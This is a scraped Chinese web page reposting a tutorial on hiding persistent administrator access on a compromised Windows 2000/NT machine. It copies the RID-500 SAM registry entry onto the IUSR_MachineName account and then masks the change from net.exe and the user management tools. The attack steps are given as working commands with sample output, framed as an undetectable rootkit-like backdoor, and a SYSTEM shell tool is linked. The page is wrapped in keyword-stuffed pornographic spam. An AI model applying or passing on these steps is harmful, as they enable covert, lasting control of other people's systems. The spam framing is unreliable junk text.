<bdo id="cmp0s"></bdo>
    <ol id="cmp0s"></ol>
  1. <tr id="cmp0s"></tr>

    <abbr id="cmp0s"><menu id="cmp0s"><input id="cmp0s"></input></menu></abbr>
    <blockquote id="cmp0s"><strike id="cmp0s"></strike></blockquote>

  2. 国产三级久久精品三级,亚洲成在人线在线播放无码 ,91精品国产自产在线老师啪l,中文字幕免费不卡在线视频,高清欧美性猛交xxxx黑人猛交 ,亚洲bt欧美bt精品,婷婷网址,真实国产乱子伦对白在线播放

    克隆管理員帳號的方法

    時間:2022-10-10 04:39:54 電腦安全

    克隆管理員帳號的方法大全

      經(jīng)常看到一些人在入侵一臺Windows 2000或者Windows NT后堂而皇之地創(chuàng)建一個管理員組的用戶,似乎當管理員不存在一般,今天偶違背一下偶以前的初衷,Share一個類似于RootKit的玩藝,當然,這些過程也是可以用腳本實現(xiàn)的,但是我就不寫了,OK,Show Time Now。

      首先要讓大家知道的概念是在Windows 2000和Windows NT里,默認管理員帳號的SID是固定的500(0x1f4),那么我們可以用機器里已經(jīng)存在的一個帳號將SID為500的帳號進行克隆,在這里我們選擇的帳號是IUSR_MachineName(當然,為了加強隱蔽性,我們選擇了這個帳號,所有用戶都可以用以下的方法,只不過這個用戶較常見罷了),測試環(huán)境為Windows 2000 Server。

      運行一個System的CMD Shell( http://www.sometips.com/tips/scripts/173.htm 或使用Http://www.sometips.com/soft/psu.exe),然后在該CMD Shell里面運行

      regedit /e adam.reg HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersF4

      這樣我們將SID 為500的管理員帳號的相關(guān)信息導出,然后編輯adam.reg文件,將adam.reg文件的第三行--[HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersF4]最后的'1F4'修改為IUSR_MachineName的SID(大部分的機器該用戶的SID都為0x3E9,如果機器在最初安裝的時候沒有安裝IIS,而自己創(chuàng)建了帳號后再安裝IIS就有可能不是這個值),將Root.reg文件中的'1F4'修改為'3E9'后執(zhí)行

      regedit /s adam.reg

      導入該Reg文件

      然后運行

      net user IUSR_MachineName Sometips

      修改IUSR_MachineName的密碼(最好使用14位的密碼,越像IUSR_MachineName的密碼越好)

      OK,大功告成...

      這樣,我們擁有和默認管理員一樣的桌面、一樣的Profile.....

      而且,當我們運行.net localgroup administrators 時,看看結(jié)果:

      C:>net localgroup administrators

      Alias name administrators

      Comment Administrators have complete and unrestricted access to the computer/domain

      Members

      -------------------------------------------------------------------------------

      Administrator

      The command completed successfully.

      再看看USER2SID的輸出結(jié)果:

      C:>user2sid Administrator

      S-1-5-21-1004336348-1078145449-854245398-500

      Number of subauthorities is 5

      Domain is IDONTKNOW

      Length of SID in memory is 28 bytes

      Type of SID is SidTypeUser

      C:>user2sid iusr_machinename

      S-1-5-21-1004336348-1078145449-854245398-1001

      Number of subauthorities is 5

      Domain is IDONTKNOW

      Length of SID in memory is 28 bytes

      Type of SID is SidTypeUser

      我想,再高明的管理員也看不到任何的異狀了...而且,隨便管理員改成什么密碼,我照樣可以用IUSR_MachineName,密碼為Sometips登陸...(沒有哪位大俠級的管理員喜歡經(jīng)常修改IUSR_MachineName為其他的名字吧)

      ^_^,這算不算RootKit...

      附:

      1、感謝叮叮付出需要reinstall OS的代價...

      2、任何用以上方法進行試驗所導致的系統(tǒng)無法使用均與偶無關(guān),偶均不提供技術(shù)支持...

      -----------------------------------------------------------------------------

      叮叮 的補充完善

      很多人提到使用了管理工具的用戶管理后,能夠發(fā)現(xiàn)IUSR_MachineName被提升了權(quán)限。

      現(xiàn)給出解決辦法。

      方法同上,不過這次修改內(nèi)容多一些。即

      這次要導出兩個key內(nèi)容:

      一個是adam提到的

      regedit /e adam.reg HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersF4

      然后另外一個是你需要修改那個賬號的值

      regedit /e iusr.reg HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersE9

      然后按照adam提到的修改adam.reg

      “將adam.reg文件的第三行--[HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersF4]最后的'1F4'修改為IUSR_MachineName的SID”

      現(xiàn)在,你還要從iusr.reg文件中復制一下內(nèi)容

      就是將iusr.reg文件中“'V'=hex:0”開始一直到iusr.reg文件結(jié)束部分復制下來

      然后替換掉adam.reg中同樣位置的部分

      最后使用

      regedit /s adam.reg

      導入該Reg文件

      呵呵,別忘了給這個IUSR_MachineName改密碼哦。

      hehe,ok,大功告成。

      現(xiàn)在IUSR_MachineName賬號擁有了管理員的權(quán)限,但是你使用net.exe和

      管理工具中的用戶管理都將看不到任何痕跡,即使你去察看所屬于的組和用戶。

      都和修改前沒有任何區(qū)別。

    【克隆管理員帳號的方法】相關(guān)文章:

    克隆的作文03-17

    克隆陽光作文10-21

    克隆自己作文02-20

    克隆樹林作文10-14

    有關(guān)克隆的作文05-21

    有關(guān)克隆作文10-31

    克隆的煩惱作文01-15

    關(guān)于克隆的作文02-23

    家鄉(xiāng)的克隆果園作文10-28

    我要克隆作文02-06

    主站蜘蛛池模板: 亚洲一级毛片在线观播放| 久久久久女人| 激情国产av做激情国产爱| 蜜臀AV午夜一区二区三区| 8888四色奇米在线观看| 国产性色的免费视频网站| 91视频在| 日韩有码玖玖资源中文字幕人妻不卡 | 国产jizz| 色www永久免费视频| 永久黄网站色视频免费| 2022国产精品福利在线观看| 亚洲三级香港三级久久| 福利一区二区视频在线| 中文字幕人妻系列| 日韩丨亚洲丨制服丨痴汉| 人妻AV无码AV中文AV日韩AV| 精品国产AⅤ一区二区三区4区| 天天躁夜夜躁天干天干| 韩国日本三级在线观看| 香蕉亚洲欧洲在线一区| 国产精成人品一区| 四川丰满少妇无套内谢| 中文av字幕在线观看| 亚洲色大成网站www久久九九| 亚洲国产成av人天堂无码| 伊大人香蕉久久网欧美| 久久精品黄aa片一区二区三区| 午夜精品久久久久久久爽| 美女性爽视频国产免费| 久久综合精品国产丝袜长腿 | 日韩AV有码无码一区二区三区| 无码精品人妻一区二区三区老牛| 激情综合五月网| mm1313亚洲国产精品无码试看| 国产美女久久久亚洲综合| 一夜七次郎最新网站| 宽甸| 欧美人与动人物牲交免费观看| 亚洲电影欧美电影| 国产日韩一区二区三区在线观看|